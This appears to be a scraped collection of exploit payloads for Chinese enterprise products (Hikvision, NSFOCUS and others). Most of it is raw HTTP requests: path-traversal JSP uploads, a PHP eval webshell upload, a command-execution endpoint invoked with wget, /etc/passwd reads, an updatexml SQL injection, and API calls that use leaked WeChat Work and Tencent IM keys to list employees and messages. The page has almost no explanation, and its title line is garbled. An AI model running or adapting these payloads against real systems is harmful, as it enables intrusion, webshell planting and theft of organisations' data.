【蛟龙出海】超级高保真，拓尔思6个 day

/artemis-portal/artemis/env

POST /center/api/files;.html HTTP/1.1Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"Content-Type: application/zip

<%out.print("test3");%>

------WebKitFormBoundary9PggsiM755PLa54a--

WEB-INF/classes/com/hikvision/svm/controller/ExternalController.class

WEB-INF/classes/com/hikvision/svm/business/serivce/impl/ExternalBusinessServiceImpl.class

POST /svm/api/external/report HTTP/1.1Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"Content-Type: application/zip

<%out.print("test");%>

------WebKitFormBoundary9PggsiM755PLa54a--

/portal/ui/login/..;/..;/new.jsp

<?php          $file_name = $_GET['fileName'];          $file_path = '../../../log/'.$file_name;          $fp = fopen($file_path, "r");          while($line = fgets($fp)){            $line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));            echo '<span style="font-size:16px">'.$line.'</span>';          }          fclose($fp);?>

/serverLog/showFile.php?fileName=../web/html/main.php

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36Connection: closeContent-Length: 259Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4Accept-Encoding: gzip

--e64bdf16c554bbc109cecef6451c26a4Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"Content-Type: image/jpeg

<?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>

--e64bdf16c554bbc109cecef6451c26a4--

/attachment/3466744850/xxx.php

POST /api/v1/device/bugsInfo HTTP/1.1Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9Host: 

--1d52ba2a11ad8a915eddab1a0e85acd9Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"

lang|s:52:"../../../../../../../../../../../../../../../../tmp/";

--1d52ba2a11ad8a915eddab1a0e85acd9--

POST /api/v1/device/bugsInfo HTTP/1.1Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0efHost: 

--4803b59d015026999b45993b1245f0efContent-Disposition: form-data; name="file"; filename="compose.php"



<?php eval($_POST['cmd']);?>

--4803b59d015026999b45993b1245f0ef--

POST /api/v1/device/bugsInfo HTTP/1.1Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0efHost: 

--4803b59d015026999b45993b1245f0efContent-Disposition: form-data; name="file"; filename="compose.php"



<?php eval($_POST['cmd']);?>

--4803b59d015026999b45993b1245f0ef--

POST /mail/include/header_main.php HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71Host:

cmd=phpinfo();

<?php  require_once 'Nsc/Websvc/Response.php';class ExecController extends Cavy_Controller_Action {

  var $models = 'no';

  public function index() {    $command = $this->_params['cmd'];    $ret = 0;    $output = array();    exec($command,$output,$ret);    $result = new StdClass;    if ($ret != 0) {      $result->code = Nsc_Websvc_Response::EXEC_ERROR;      $result->text = "exec error";    }    else {      $result->code = Nsc_Websvc_Response::SUCCESS;      //      $result->text = implode("\n",$output);      $result->text = "WEBSVC OK";    }    $this->_render(array('result'=>$result),'/websvc/result');  }}?>

/webconf/Exec/index?cmd=wget%20xxx.xxx.xxx

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin

/cgi-bin/gateway/agentinfo

#腾讯企业微信企业idqywx.corpid=xxxxxx#腾讯企业微信管理后台的应用密钥qywxapplet.appSecret=xxxxxxxxxxxx#腾讯企业微信管理后台绑定的小程序appidqywxapplet.appid=xxxxxxxxxx#腾讯ocr appid,演示环境使用了腾讯的ocr接口，行方不使用腾讯ocr接口则不必配置这里。配置成"-"即可ocr.tenc.appId=-#腾讯ocr秘钥ocr.tenc.secret=-#网录制视频时分段时长，分钟，如无需求不要改动此项duration=120

https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=xxxxxx&corpsecret=xxxxxx

eQq8YjcgxHOtk39Xu4dxxxxxxxxxxxxxxklx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

https://qyapi.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=eQq8YjcgxHOtk39Xu4d30xxxxxxxxxxxxxxlx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

https://qyapi.weixin.qq.com/cgi-bin/department/list?access_token=eQq8YjcgxHOtk39Xu4dxxxxxxxxxxxxxx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token=eQq8YjcgxHOtk39Xu4d30rJx0xxxxxxxxxxxxxxLE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&department_id=1&&fetch_child=1

https://qyapi.weixin.qq.com/cgi-bin/user/list?access_token=eQq8YjcgxHOtk39Xu4d3xxxxxxxxxxxxxxULE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&department_id=1&fetch_child=1

https://qyapi.weixin.qq.com/cgi-bin/department/get?access_token=eQq8Yjcxxxxxxxxxxxxxxlx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&id=963233

https://qyapi.weixin.qq.com/cgi-bin/corp/get_join_qrcode?access_token=eQq8YjcgxHOtk3xxxxxxxxxxxxxxw6Owklx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

https://qyapi.weixin.qq.com/cgi-bin/checkin/getcorpcheckinoption?access_token=eQq8YjcgxHOtk39xxxxxxxxxxxxxxi-w6Owklx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

POST /cgi-bin/oa/vacation/getuservacationquota?access_token=eQq8YjcgxHOtk39Xu4xxxxxxxxxxxxxxlx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.1Host: qyapi.weixin.qq.comConnection: closeX-Forwarded-For: 101.226.129.166Content-Type: application/jsonContent-Length: 31

{    "userid": "xxxxxx"}

qq.im.sdkappid=xxxxxxqq.im.privateKey=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqq.im.identifier=xxxxxxqq.im.apiver=2qq.live.bizid=xxxxxx

eJw1zcEKgkAUheFXkVmH3hkxxxxxxxxxxxxxxv-gnDdJt3u9VRVZaoTpQBbaWFCqexxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

https://console.tim.qq.com/v4/group_open_http_svc/get_appid_group_list?sdkappid=1400571601&identifier=admin&usersig=eJw1zcEKgkAUxxxxxxxxxxxxxxqW1iiJlr07qXp9v-gnDdJt3u9VRVZaoTpQBbaWFCqexxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&random=99999999&contenttype=json

https://console.tim.qq.com/v4/openconfigsvr/getappinfo?sdkappid=1400571601&identifier=vc_system&usersig=eJw1zcEKgkAUheFXkVmxxxxxxxxxxxxxx07qXp9v-gnDdJt3u9VRVZaoTpQBbaWFCqexxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&random=99999999

https://console.tim.qq.com/v4/open_msg_svc/get_history?sdkappid=1400571601&identifier=vc_system&usersig=eJw1zcEKgkAUxxxxxxxxxxxxxxp9v-gnDdJt3u9VRVZaoTpQBbaWFCqexxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&random=99999999&contenttype=json

https://console.tim.qq.com/v4/ConfigSvc/GetIPList?sdkappid=1400571601&identifier=vc_system&usersig=eJw1zcEKgkAUheFXkVmH3hkxxxxxxxxxxxxxx9v-gnDdJt3u9VRVZaoTpQBbaWFCqexxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&random=99999999&contenttype=json

https://tcc.tencentcs.com/im-api-tool/index.html#/v4/group_open_http_svc/get_appid_group_list

POST /publishing/publishing/material/file/video HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 804Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close

--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"

Test--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"

submit--dd8f988919484abab3816881c55272a7--

/publishingImg/VIDEO/230812152005170200.jsp

/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D